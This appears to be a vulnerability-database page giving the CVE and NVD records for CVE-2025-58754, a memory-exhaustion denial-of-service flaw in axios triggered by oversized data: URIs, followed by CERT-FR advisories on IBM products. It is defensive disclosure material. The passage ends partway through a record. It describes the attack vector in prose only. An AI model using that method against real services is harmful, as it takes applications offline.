Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2025-58754 (GCVE-0-2025-58754)
Vulnerability from cvelistv5
- CWE-770 - Allocation of Resources Without Limits or Throttling
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-58754",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-09-12T13:08:38.895896Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-09-12T13:08:42.426Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/axios/axios/security/advisories/GHSA-4hjh-wcwx-xvwj"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "axios",
"vendor": "axios",
"versions": [
{
"status": "affected",
"version": "\u003e= 1.0.0, \u003c 1.12.0"
},
{
"status": "affected",
"version": "\u003c 0.30.2"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Axios is a promise based HTTP client for the browser and Node.js. When Axios prior to versions 0.30.2 and 1.12.0 runs on Node.js and is given a URL with the `data:` scheme, it does not perform HTTP. Instead, its Node http adapter decodes the entire payload into memory (`Buffer`/`Blob`) and returns a synthetic 200 response. This path ignores `maxContentLength` / `maxBodyLength` (which only protect HTTP responses), so an attacker can supply a very large `data:` URI and cause the process to allocate unbounded memory and crash (DoS), even if the caller requested `responseType: \u0027stream\u0027`. Versions 0.30.2 and 1.12.0 contain a patch for the issue."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-770",
"description": "CWE-770: Allocation of Resources Without Limits or Throttling",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-09-29T14:26:30.869Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/axios/axios/security/advisories/GHSA-4hjh-wcwx-xvwj",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/axios/axios/security/advisories/GHSA-4hjh-wcwx-xvwj"
},
{
"name": "https://github.com/axios/axios/pull/7011",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/axios/axios/pull/7011"
},
{
"name": "https://github.com/axios/axios/pull/7034",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/axios/axios/pull/7034"
},
{
"name": "https://github.com/axios/axios/commit/945435fc51467303768202250debb8d4ae892593",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/axios/axios/commit/945435fc51467303768202250debb8d4ae892593"
},
{
"name": "https://github.com/axios/axios/commit/a1b1d3f073a988601583a604f5f9f5d05a3d0b67",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/axios/axios/commit/a1b1d3f073a988601583a604f5f9f5d05a3d0b67"
},
{
"name": "https://github.com/axios/axios/releases/tag/v0.30.2",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/axios/axios/releases/tag/v0.30.2"
},
{
"name": "https://github.com/axios/axios/releases/tag/v1.12.0",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/axios/axios/releases/tag/v1.12.0"
}
],
"source": {
"advisory": "GHSA-4hjh-wcwx-xvwj",
"discovery": "UNKNOWN"
},
"title": "Axios is vulnerable to DoS attack through lack of data size check"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-58754",
"datePublished": "2025-09-12T01:16:40.513Z",
"dateReserved": "2025-09-04T19:18:09.499Z",
"dateUpdated": "2025-09-29T14:26:30.869Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1",
"vulnerability-lookup:meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2025-58754\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-09-12T02:15:46.873\",\"lastModified\":\"2025-10-24T20:56:49.430\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Axios is a promise based HTTP client for the browser and Node.js. When Axios prior to versions 0.30.2 and 1.12.0 runs on Node.js and is given a URL with the `data:` scheme, it does not perform HTTP. Instead, its Node http adapter decodes the entire payload into memory (`Buffer`/`Blob`) and returns a synthetic 200 response. This path ignores `maxContentLength` / `maxBodyLength` (which only protect HTTP responses), so an attacker can supply a very large `data:` URI and cause the process to allocate unbounded memory and crash (DoS), even if the caller requested `responseType: \u0027stream\u0027`. Versions 0.30.2 and 1.12.0 contain a patch for the issue.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-770\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:axios:axios:*:*:*:*:*:node.js:*:*\",\"versionEndExcluding\":\"0.30.2\",\"matchCriteriaId\":\"42CE8592-2921-474D-9A2A-B0ABFEDB2304\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:axios:axios:*:*:*:*:*:node.js:*:*\",\"versionStartIncluding\":\"1.0.0\",\"versionEndExcluding\":\"1.12.0\",\"matchCriteriaId\":\"037955F5-7C7D-4C3F-886B-52B009B97300\"}]}]}],\"references\":[{\"url\":\"https://github.com/axios/axios/commit/945435fc51467303768202250debb8d4ae892593\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/axios/axios/commit/a1b1d3f073a988601583a604f5f9f5d05a3d0b67\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/axios/axios/pull/7011\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Issue Tracking\",\"Patch\"]},{\"url\":\"https://github.com/axios/axios/pull/7034\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Issue Tracking\"]},{\"url\":\"https://github.com/axios/axios/releases/tag/v0.30.2\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Release Notes\"]},{\"url\":\"https://github.com/axios/axios/releases/tag/v1.12.0\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Release Notes\"]},{\"url\":\"https://github.com/axios/axios/security/advisories/GHSA-4hjh-wcwx-xvwj\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/axios/axios/security/advisories/GHSA-4hjh-wcwx-xvwj\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-58754\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-09-12T13:08:38.895896Z\"}}}], \"references\": [{\"url\": \"https://github.com/axios/axios/security/advisories/GHSA-4hjh-wcwx-xvwj\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-09-12T13:08:31.642Z\"}}], \"cna\": {\"title\": \"Axios is vulnerable to DoS attack through lack of data size check\", \"source\": {\"advisory\": \"GHSA-4hjh-wcwx-xvwj\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"axios\", \"product\": \"axios\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 1.12.0\"}]}], \"references\": [{\"url\": \"https://github.com/axios/axios/security/advisories/GHSA-4hjh-wcwx-xvwj\", \"name\": \"https://github.com/axios/axios/security/advisories/GHSA-4hjh-wcwx-xvwj\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/axios/axios/pull/7011\", \"name\": \"https://github.com/axios/axios/pull/7011\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/axios/axios/commit/945435fc51467303768202250debb8d4ae892593\", \"name\": \"https://github.com/axios/axios/commit/945435fc51467303768202250debb8d4ae892593\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/axios/axios/releases/tag/v1.12.0\", \"name\": \"https://github.com/axios/axios/releases/tag/v1.12.0\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Axios is a promise based HTTP client for the browser and Node.js. When Axios prior to version 1.11.0 runs on Node.js and is given a URL with the `data:` scheme, it does not perform HTTP. Instead, its Node http adapter decodes the entire payload into memory (`Buffer`/`Blob`) and returns a synthetic 200 response. This path ignores `maxContentLength` / `maxBodyLength` (which only protect HTTP responses), so an attacker can supply a very large `data:` URI and cause the process to allocate unbounded memory and crash (DoS), even if the caller requested `responseType: \u0027stream\u0027`. Version 1.11.0 contains a patch for the issue.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-770\", \"description\": \"CWE-770: Allocation of Resources Without Limits or Throttling\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-09-12T01:16:40.513Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2025-58754\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-09-12T13:08:42.426Z\", \"dateReserved\": \"2025-09-04T19:18:09.499Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-09-12T01:16:40.513Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
}
}
fkie_cve-2025-58754
Vulnerability from fkie_nvd
| URL | Tags | ||
|---|---|---|---|
| security-advisories@github.com | https://github.com/axios/axios/commit/945435fc51467303768202250debb8d4ae892593 | Patch | |
| security-advisories@github.com | https://github.com/axios/axios/commit/a1b1d3f073a988601583a604f5f9f5d05a3d0b67 | Patch | |
| security-advisories@github.com | https://github.com/axios/axios/pull/7011 | Issue Tracking, Patch | |
| security-advisories@github.com | https://github.com/axios/axios/pull/7034 | Issue Tracking | |
| security-advisories@github.com | https://github.com/axios/axios/releases/tag/v0.30.2 | Release Notes | |
| security-advisories@github.com | https://github.com/axios/axios/releases/tag/v1.12.0 | Release Notes | |
| security-advisories@github.com | https://github.com/axios/axios/security/advisories/GHSA-4hjh-wcwx-xvwj | Exploit, Vendor Advisory | |
| 134c704f-9b21-4f2e-91b3-4a467353bcc0 | https://github.com/axios/axios/security/advisories/GHSA-4hjh-wcwx-xvwj | Exploit, Vendor Advisory |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:axios:axios:*:*:*:*:*:node.js:*:*",
"matchCriteriaId": "42CE8592-2921-474D-9A2A-B0ABFEDB2304",
"versionEndExcluding": "0.30.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:axios:axios:*:*:*:*:*:node.js:*:*",
"matchCriteriaId": "037955F5-7C7D-4C3F-886B-52B009B97300",
"versionEndExcluding": "1.12.0",
"versionStartIncluding": "1.0.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Axios is a promise based HTTP client for the browser and Node.js. When Axios prior to versions 0.30.2 and 1.12.0 runs on Node.js and is given a URL with the `data:` scheme, it does not perform HTTP. Instead, its Node http adapter decodes the entire payload into memory (`Buffer`/`Blob`) and returns a synthetic 200 response. This path ignores `maxContentLength` / `maxBodyLength` (which only protect HTTP responses), so an attacker can supply a very large `data:` URI and cause the process to allocate unbounded memory and crash (DoS), even if the caller requested `responseType: \u0027stream\u0027`. Versions 0.30.2 and 1.12.0 contain a patch for the issue."
}
],
"id": "CVE-2025-58754",
"lastModified": "2025-10-24T20:56:49.430",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2025-09-12T02:15:46.873",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/axios/axios/commit/945435fc51467303768202250debb8d4ae892593"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/axios/axios/commit/a1b1d3f073a988601583a604f5f9f5d05a3d0b67"
},
{
"source": "security-advisories@github.com",
"tags": [
"Issue Tracking",
"Patch"
],
"url": "https://github.com/axios/axios/pull/7011"
},
{
"source": "security-advisories@github.com",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/axios/axios/pull/7034"
},
{
"source": "security-advisories@github.com",
"tags": [
"Release Notes"
],
"url": "https://github.com/axios/axios/releases/tag/v0.30.2"
},
{
"source": "security-advisories@github.com",
"tags": [
"Release Notes"
],
"url": "https://github.com/axios/axios/releases/tag/v1.12.0"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/axios/axios/security/advisories/GHSA-4hjh-wcwx-xvwj"
},
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/axios/axios/security/advisories/GHSA-4hjh-wcwx-xvwj"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-770"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
CERTFR-2025-AVI-0896
Vulnerability from certfr_avis
De multiples vulnérabilités ont été découvertes dans les produits IBM. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, un déni de service à distance et une atteinte à la confidentialité des données.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
| Vendor | Product | Description | ||
|---|---|---|---|---|
| IBM | Sterling Connect:Direct | Sterling Connect:Direct Web Services versions 6.4.x antérieures à 6.4.0.4 | ||
| IBM | Cloud Pak | Cloud Pak for Security versions antérieures à 1.11.5.0 | ||
| IBM | QRadar | QRadar Investigation Assistant versions antérieures à 1.2.0 | ||
| IBM | WebSphere | WebSphere eXtreme Scale versions 8.6.1.x sans le correctif APAR PH68446 | ||
| IBM | QRadar Suite Software | QRadar Suite Software versions antérieures à 1.11.5.0 | ||
| IBM | Security QRadar EDR | Security QRadar EDR versions antérieures à 3.12.19 | ||
| IBM | Sterling Connect:Direct | Sterling Connect:Direct Web Services versions 6.3.x antérieures à 6.3.0.15 | ||
| IBM | Sterling Connect:Direct | Sterling Connect:Direct Web Services versions 6.2.x antérieures à 6.2.0.29 |
| Title | Publication Time | Tags | |||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "Sterling Connect:Direct Web Services versions 6.4.x ant\u00e9rieures \u00e0 6.4.0.4",
"product": {
"name": "Sterling Connect:Direct",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Cloud Pak for Security versions ant\u00e9rieures \u00e0 1.11.5.0",
"product": {
"name": "Cloud Pak",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "QRadar Investigation Assistant versions ant\u00e9rieures \u00e0 1.2.0",
"product": {
"name": "QRadar",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "WebSphere eXtreme Scale versions 8.6.1.x sans le correctif APAR PH68446",
"product": {
"name": "WebSphere",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "QRadar Suite Software versions ant\u00e9rieures \u00e0 1.11.5.0",
"product": {
"name": "QRadar Suite Software",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Security QRadar EDR versions ant\u00e9rieures \u00e0 3.12.19",
"product": {
"name": "Security QRadar EDR",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Connect:Direct Web Services versions 6.3.x ant\u00e9rieures \u00e0 6.3.0.15",
"product": {
"name": "Sterling Connect:Direct",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Connect:Direct Web Services versions 6.2.x ant\u00e9rieures \u00e0 6.2.0.29",
"product": {
"name": "Sterling Connect:Direct",
"vendor": {
"name": "IBM",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2025-31651",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-31651"
},
{
"name": "CVE-2025-27818",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27818"
},
{
"name": "CVE-2025-27516",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27516"
},
{
"name": "CVE-2024-55565",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-55565"
},
{
"name": "CVE-2025-46548",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-46548"
},
{
"name": "CVE-2025-27817",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27817"
},
{
"name": "CVE-2023-32082",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-32082"
},
{
"name": "CVE-2025-22228",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22228"
},
{
"name": "CVE-2019-9674",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-9674"
},
{
"name": "CVE-2024-6866",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6866"
},
{
"name": "CVE-2025-1647",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1647"
},
{
"name": "CVE-2020-10735",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-10735"
},
{
"name": "CVE-2024-12798",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12798"
},
{
"name": "CVE-2025-49125",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-49125"
},
{
"name": "CVE-2025-50106",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50106"
},
{
"name": "CVE-2018-8740",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-8740"
},
{
"name": "CVE-2025-30754",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30754"
},
{
"name": "CVE-2025-22233",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22233"
},
{
"name": "CVE-2024-38820",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38820"
},
{
"name": "CVE-2025-50182",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50182"
},
{
"name": "CVE-2025-49826",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-49826"
},
{
"name": "CVE-2025-50181",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50181"
},
{
"name": "CVE-2025-30474",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30474"
},
{
"name": "CVE-2025-4565",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4565"
},
{
"name": "CVE-2025-7783",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-7783"
},
{
"name": "CVE-2024-21538",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21538"
},
{
"name": "CVE-2023-44389",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-44389"
},
{
"name": "CVE-2022-38749",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-38749"
},
{
"name": "CVE-2025-22868",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22868"
},
{
"name": "CVE-2024-6844",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6844"
},
{
"name": "CVE-2024-12801",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12801"
},
{
"name": "CVE-2025-48976",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48976"
},
{
"name": "CVE-2025-48989",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48989"
},
{
"name": "CVE-2022-22968",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-22968"
},
{
"name": "CVE-2025-50059",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50059"
},
{
"name": "CVE-2025-27553",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27553"
},
{
"name": "CVE-2025-30761",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30761"
},
{
"name": "CVE-2024-47535",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47535"
},
{
"name": "CVE-2024-6484",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6484"
},
{
"name": "CVE-2025-48988",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48988"
},
{
"name": "CVE-2025-47278",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47278"
},
{
"name": "CVE-2024-6485",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6485"
},
{
"name": "CVE-2025-1767",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1767"
},
{
"name": "CVE-2025-49005",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-49005"
},
{
"name": "CVE-2025-30218",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30218"
},
{
"name": "CVE-2023-36479",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-36479"
},
{
"name": "CVE-2022-31628",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-31628"
},
{
"name": "CVE-2024-47081",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47081"
},
{
"name": "CVE-2024-7598",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-7598"
},
{
"name": "CVE-2025-29927",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-29927"
},
{
"name": "CVE-2025-55668",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55668"
},
{
"name": "CVE-2022-38751",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-38751"
},
{
"name": "CVE-2025-25193",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-25193"
},
{
"name": "CVE-2025-5889",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-5889"
},
{
"name": "CVE-2025-30749",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30749"
},
{
"name": "CVE-2025-46653",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-46653"
},
{
"name": "CVE-2025-27789",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27789"
},
{
"name": "CVE-2024-6827",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6827"
},
{
"name": "CVE-2025-48924",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48924"
},
{
"name": "CVE-2022-38750",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-38750"
},
{
"name": "CVE-2025-53864",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53864"
},
{
"name": "CVE-2024-6839",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6839"
},
{
"name": "CVE-2025-48997",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48997"
},
{
"name": "CVE-2025-48387",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48387"
},
{
"name": "CVE-2025-58754",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58754"
},
{
"name": "CVE-2025-46392",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-46392"
},
{
"name": "CVE-2025-7338",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-7338"
},
{
"name": "CVE-2024-44906",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-44906"
},
{
"name": "CVE-2025-59343",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-59343"
},
{
"name": "CVE-2025-47273",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47273"
}
],
"initial_release_date": "2025-10-17T00:00:00",
"last_revision_date": "2025-10-17T00:00:00",
"links": [],
"reference": "CERTFR-2025-AVI-0896",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2025-10-17T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Injection de code indirecte \u00e0 distance (XSS)"
},
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
},
{
"description": "Injection SQL (SQLi)"
},
{
"description": "Falsification de requ\u00eates c\u00f4t\u00e9 serveur (SSRF)"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits IBM. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance, un d\u00e9ni de service \u00e0 distance et une atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits IBM",
"vendor_advisories": [
{
"published_at": "2025-10-15",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7247985",
"url": "https://www.ibm.com/support/pages/node/7247985"
},
{
"published_at": "2025-10-15",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7247975",
"url": "https://www.ibm.com/support/pages/node/7247975"
},
{
"published_at": "2025-10-14",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7247893",
"url": "https://www.ibm.com/support/pages/node/7247893"
},
{
"published_at": "2025-10-16",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7248127",
"url": "https://www.ibm.com/support/pages/node/7248127"
},
{
"published_at": "2025-10-16",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7248118",
"url": "https://www.ibm.com/support/pages/node/7248118"
}
]
}
CERTFR-2025-AVI-0947
Vulnerability from certfr_avis
De multiples vulnérabilités ont été découvertes dans les produits IBM. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, une élévation de privilèges et un déni de service à distance.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
| Vendor | Product | Description | ||
|---|---|---|---|---|
| IBM | Sterling Connect:Direct | Sterling Connect:Direct versions 6.2.x antérieures à 6.2.0.9.iFix005 pour Unix | ||
| IBM | Sterling Connect:Direct | Sterling Connect:Direct versions 6.4.x antérieures à 6.4.0.2.iFix004 pour Unix | ||
| IBM | QRadar | QRadar SIEM versions 7.5.x antérieures à 7.5.0 UP14 | ||
| IBM | QRadar Hub | Qradar Hub versions antérieures à 3.9.0 | ||
| IBM | Sterling Connect:Direct | Sterling Connect:Direct versions 6.3.x antérieures à 6.3.0.5.iFix008 pour Unix | ||
| IBM | QRadar | QRadar Incident Forensics versions 7.5.x antérieures à 7.5.0 UP14 |
| Title | Publication Time | Tags | ||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "Sterling Connect:Direct versions 6.2.x ant\u00e9rieures \u00e0 6.2.0.9.iFix005 pour Unix",
"product": {
"name": "Sterling Connect:Direct",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
